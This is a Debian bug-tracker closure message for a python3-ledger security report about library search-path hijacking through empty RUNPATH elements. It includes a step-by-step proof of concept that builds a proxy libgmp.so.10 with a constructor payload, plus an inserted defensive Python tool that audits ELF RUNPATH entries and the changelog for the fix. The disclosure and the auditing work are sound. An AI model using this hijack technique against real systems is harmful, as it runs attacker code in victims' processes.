Your message dated Thu, 04 Jun 2026 23:34:22 +0000
with message-id <[email protected]>
and subject line Bug#1138597: fixed in ledger 3.4.0-3
has caused the Debian Bug report #1138597,
regarding python3-ledger: Library search path hijacking via empty RUNPATH elements
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
1138597: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1138597
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: python3-ledger
Version: 3.4.0-1+b1
Severity: important
Tags: security

*Summary:*

The python3-ledger Debian package installs the Python extension module:
/usr/lib/python3/dist-packages/ledger.cpython-313-aarch64-linux-gnu.so

This library contains a RUNPATH consisting entirely of empty path elements:

RUNPATH [:::::::::::::::]

Empty entries in an ELF RUNPATH are interpreted by the dynamic linker as
the current working directory (CWD). As a result, when
ledger.cpython-313-aarch64-linux-gnu.so resolves its dependencies, the
dynamic linker searches the process working directory before falling back
to the system library paths.

This permits library search path hijacking if an attacker can place a
malicious shared library in a directory from which a victim executes
software that imports the ledger module.

*Impact:*

An attacker can cause execution of attacker-controlled code in the security
context of the user running the affected application.

Since python3-ledger provides Python bindings, a victim might execute a
Python script from a directory (such as a downloaded dataset, extracted
archive, shared workspace, or /tmp) that contains an attacker-controlled
shared library. If this occurs, the malicious library will be loaded and
executed before the legitimate system library.

This issue falls under CWE-427 (Uncontrolled Search Path Element).

*Proof of Concept:*

*1. Create an attacker-controlled workspace:*

$ mkdir -p /tmp/malicious_workspace
$ cd /tmp/malicious_workspace

*2. Create the malicious payload:*

$ cat << 'EOF' > poc_ledger.c
#include <stdio.h>
#include <stdlib.h>

__attribute__((constructor))
void exploit() {
    printf("\n[!!!] LEDGER HIJACK SUCCESSFUL [!!!]\n");
    exit(0);
}
EOF

*3. Create a dummy version map to satisfy dependency version requirements:*

$ cat << 'EOF' > versions.map
GLIBC_2.17 { };
GLIBC_2.32 { };
EOF

*4. Build a proxy libgmp.so.10 library using DT_AUXILIARY so normal symbol
resolution continues:*

$ gcc -shared -fPIC poc_ledger.c \
    -o libgmp.so.10 \
    -Wl,-f,/usr/lib/aarch64-linux-gnu/libgmp.so.10 \
    -Wl,--version-script=versions.map

*5. Create a Python script that imports the vulnerable library:*

$ cat << 'EOF' > trigger.py
import ledger
print("ledger imported successfully!")
EOF

*6. Execute the trigger from the malicious directory:*

$ python3 trigger.py


*Result:*
[!!!] LEDGER HIJACK SUCCESSFUL [!!!]

*Expected Fix:*

The package should not ship binaries containing empty path elements in
their RUNPATH. The RUNPATH entry should be removed or replaced with an
explicit trusted library path.

--- End Message ---
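A defender-side complement to the report above, added here as an example and not part of the bug thread, the ledger project or Debian's tooling: a small Python audit that reads DT_RPATH/DT_RUNPATH out of an ELF64 object and flags every element the dynamic linker would resolve against the process working directory (empty elements, which the loader treats as CWD, and relative paths). Because a real `ledger.cpython-313-aarch64-linux-gnu.so` is not available offline, the block also constructs a minimal ELF64 object in memory whose RUNPATH mirrors the `[:::::::::::::::]` value quoted in the report; that sample, the helper names and the `$ORIGIN` handling are assumptions of this example. For a shipped package the same check is what `readelf -d <file>` lets you eyeball by hand.

```python
import struct
import sys

# Dynamic-section tags and section types from elf.h.
DT_NULL, DT_NEEDED, DT_RPATH, DT_RUNPATH = 0, 1, 15, 29
SHT_STRTAB, SHT_DYNAMIC = 3, 6
EHDR_FMT, SHDR_FMT, DYN_FMT = "<16sHHIQQQIHHHHHH", "<IIQQQQIIQQ", "<qQ"

# Constructed value mirroring the RUNPATH quoted in the bug report:
# 15 separators, hence 16 empty elements, each of which ld.so reads as CWD.
SAMPLE_RUNPATH = ":" * 15


def unsafe_search_elements(path_string: str) -> list:
    """Return the elements of an RPATH/RUNPATH string that resolve relative to the
    process working directory: empty elements (CWD) and relative paths.
    $ORIGIN / ${ORIGIN} entries are resolved relative to the object and are left alone."""
    findings = []
    for elem in path_string.split(":"):
        if elem == "":
            findings.append("<empty -> CWD>")
        elif not (elem.startswith("/") or elem.startswith("$")):
            findings.append(f"{elem} (relative -> CWD)")
    return findings


def read_dynamic_paths(data: bytes) -> dict:
    """Minimal ELF64 little-endian reader: walk each SHT_DYNAMIC section and pull
    DT_NEEDED, DT_RPATH and DT_RUNPATH strings from its linked string table."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("only little-endian ELF64 objects are handled here")
    hdr = struct.unpack_from(EHDR_FMT, data, 0)
    shoff, shentsize, shnum = hdr[6], hdr[11], hdr[12]
    sections = [struct.unpack_from(SHDR_FMT, data, shoff + i * shentsize)
                for i in range(shnum)]
    result = {"DT_NEEDED": [], "DT_RPATH": [], "DT_RUNPATH": []}
    for sh in sections:
        if sh[1] != SHT_DYNAMIC:
            continue
        str_off = sections[sh[6]][4]          # sh_link -> .dynstr, take its sh_offset

        def cstr(idx, base=str_off):
            start = base + idx
            return data[start:data.index(b"\0", start)].decode()

        for pos in range(sh[4], sh[4] + sh[5], struct.calcsize(DYN_FMT)):
            tag, val = struct.unpack_from(DYN_FMT, data, pos)
            if tag == DT_NULL:
                break
            if tag == DT_NEEDED:
                result["DT_NEEDED"].append(cstr(val))
            elif tag == DT_RPATH:
                result["DT_RPATH"].append(cstr(val))
            elif tag == DT_RUNPATH:
                result["DT_RUNPATH"].append(cstr(val))
    return result


def audit_elf(data: bytes) -> dict:
    """Map each offending DT_RPATH/DT_RUNPATH string to its CWD-resolving elements;
    an empty dict means the object's search path is anchored to absolute locations."""
    info = read_dynamic_paths(data)
    findings = {}
    for tag in ("DT_RPATH", "DT_RUNPATH"):
        for value in info[tag]:
            bad = unsafe_search_elements(value)
            if bad:
                findings[f"{tag} [{value}]"] = bad
    return findings


def build_sample_elf(runpath: str, needed=("libgmp.so.10",)) -> bytes:
    """Construct a tiny ELF64 object (header, .dynstr, .dynamic, section table)
    so the reader can be exercised without a real shared library (hypothetical sample)."""
    dynstr, offsets = b"\0", {}
    for s in tuple(needed) + (runpath,):
        offsets[s] = len(dynstr)
        dynstr += s.encode() + b"\0"
    dyn = b"".join(struct.pack(DYN_FMT, DT_NEEDED, offsets[n]) for n in needed)
    dyn += struct.pack(DYN_FMT, DT_RUNPATH, offsets[runpath]) + struct.pack(DYN_FMT, DT_NULL, 0)
    dynstr_off = struct.calcsize(EHDR_FMT)              # .dynstr right after the header
    dyn_off = dynstr_off + len(dynstr)
    dyn_off += -dyn_off % 8                             # .dynamic is 8-byte aligned
    sh_off = dyn_off + len(dyn)                         # section table after .dynamic
    ehdr = struct.pack(EHDR_FMT, b"\x7fELF\x02\x01\x01" + bytes(9),
                       3, 0xB7, 1, 0, 0, sh_off, 0, 64, 56, 0, 64, 3, 0)  # ET_DYN, aarch64
    shdrs = struct.pack(SHDR_FMT, *([0] * 10))                                   # SHN_UNDEF
    shdrs += struct.pack(SHDR_FMT, 0, SHT_STRTAB, 0, 0, dynstr_off, len(dynstr), 0, 0, 1, 0)
    shdrs += struct.pack(SHDR_FMT, 0, SHT_DYNAMIC, 0, 0, dyn_off, len(dyn), 1, 0, 8, 16)
    body = ehdr + dynstr
    return body + bytes(dyn_off - len(body)) + dyn + shdrs


def main(argv):
    if len(argv) > 1:                                   # audit real files given on the command line
        for name in argv[1:]:
            with open(name, "rb") as f:
                data = f.read()
            if data[:4] == b"\x7fELF":
                for key, bad in audit_elf(data).items():
                    print(f"{name}: {key}: {len(bad)} element(s) resolve via CWD")
    else:                                               # demo on the constructed samples
        for label, rp in (("report value", SAMPLE_RUNPATH), ("explicit path", "/usr/lib/aarch64-linux-gnu")):
            print(label, audit_elf(build_sample_elf(rp)))


if __name__ == "__main__":
    main(sys.argv)
```

Run with one or more `.so` paths to audit installed objects, or with no arguments to see the constructed sample flagged (16 CWD elements) and an absolute-path RUNPATH pass clean. The reader is deliberately minimal (little-endian ELF64, section headers present); stripped objects that drop the section table would need the PT_DYNAMIC program header instead.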
--- Begin Message ---
Source: ledger
Source-Version: 3.4.0-3
Done: David Bremner <[email protected]>

We believe that the bug you reported is fixed in the latest version of
ledger, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
David Bremner <[email protected]> (supplier of updated ledger package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Thu, 04 Jun 2026 07:41:00 +0900
Source: ledger
Architecture: source
Version: 3.4.0-3
Distribution: unstable
Urgency: medium
Maintainer: Debian QA Group <[email protected]>
Changed-By: David Bremner <[email protected]>
Closes: 1049313 1138597
Changes:
 ledger (3.4.0-3) unstable; urgency=medium
 .
   * Bug fix: "Library search path hijacking via empty RUNPATH elements",
     thanks to Jonathan Trowbridge (Closes: #1138597).
   * Orphan package
 .
 ledger (3.4.0-2) unstable; urgency=medium
 .
   * Add doc/version.texi to d/clean (Closes: #1049313).
Checksums-Sha1:
 a420ceeb96ac15a01621408f98e3fa76d9abe175 1697 ledger_3.4.0-3.dsc
 e430556837e19b147a2af269be6694837d45eedb 8608 ledger_3.4.0-3.debian.tar.xz
Checksums-Sha256:
 685b6bf3b4f52857666bd849d6b8f7dd6ec6d66200f339f2e3ad9e8c8d6a073e 1697 ledger_3.4.0-3.dsc
 b8109c6ba96854951c54a0d52bb088e8aeb8eb29f60844bbe7d660d1fc7855d5 8608 ledger_3.4.0-3.debian.tar.xz
Files:
 debb0713ca45491c6643d6475900073f 1697 utils optional ledger_3.4.0-3.dsc
 6ab8e3d572efe3c8ab30e8b72a103ee2 8608 utils optional ledger_3.4.0-3.debian.tar.xz

-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQS5beC2erx2PFqyC7XhcL+0NDTnAAUCaiIGuwAKCRDhcL+0NDTn
AMKYAPoCbmbC2LwmJb95Xj3KwdZC5VBRfHOp9rHh+kbBB0cEyQEAiMcPd7hyu27q
xamLpw3CLAUXFHWgQHWueLHReFJuGAs=
=aUNY
-----END PGP SIGNATURE-----



--- End Message ---
